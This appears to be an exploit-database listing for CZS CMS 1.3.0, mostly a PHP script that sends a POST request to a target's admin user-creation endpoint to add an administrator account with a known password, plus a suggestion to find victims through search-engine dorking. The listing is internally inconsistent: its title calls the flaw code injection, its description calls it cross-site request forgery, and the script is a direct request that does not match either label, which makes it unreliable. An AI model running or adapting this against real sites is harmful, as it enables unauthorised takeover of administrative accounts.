Share
## https://sploitus.com/exploit?id=PACKETSTORM:212000
=============================================================================================================================================
| # Title : CZS CMS v 1.3.0 php code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.cszcms.com |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: CZS CMS version 1.3.0 suffers from a cross site request forgery vulnerability.
(Related : https://packetstorm.news/files/id/189609/ Related CVE numbers: ) .
[+] Usage : php poc.php
[+] Set Target : LIne 5
[+] PayLoad :
<?php
// CSRF PoC script in PHP
// Define the target URL and POST fields
$target_url = "http://TARGETSITE/admin/users/new/add";
$fields = [
'name' => 'admin',
'email' => 'admin@admin.com',
'password' => 'pass',
'con_password' => 'pass',
'group' => '1',
'pass_change' => 'yes',
'active' => 1
];
// Initialize cURL session
$ch = curl_init();
// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields)); // Post the fields as URL-encoded
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as string
// Execute cURL request and capture the response
$response = curl_exec($ch);
// Check for errors
if ($response === false) {
echo "Error: " . curl_error($ch);
} else {
echo "Request sent successfully!";
}
// Close cURL session
curl_close($ch);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================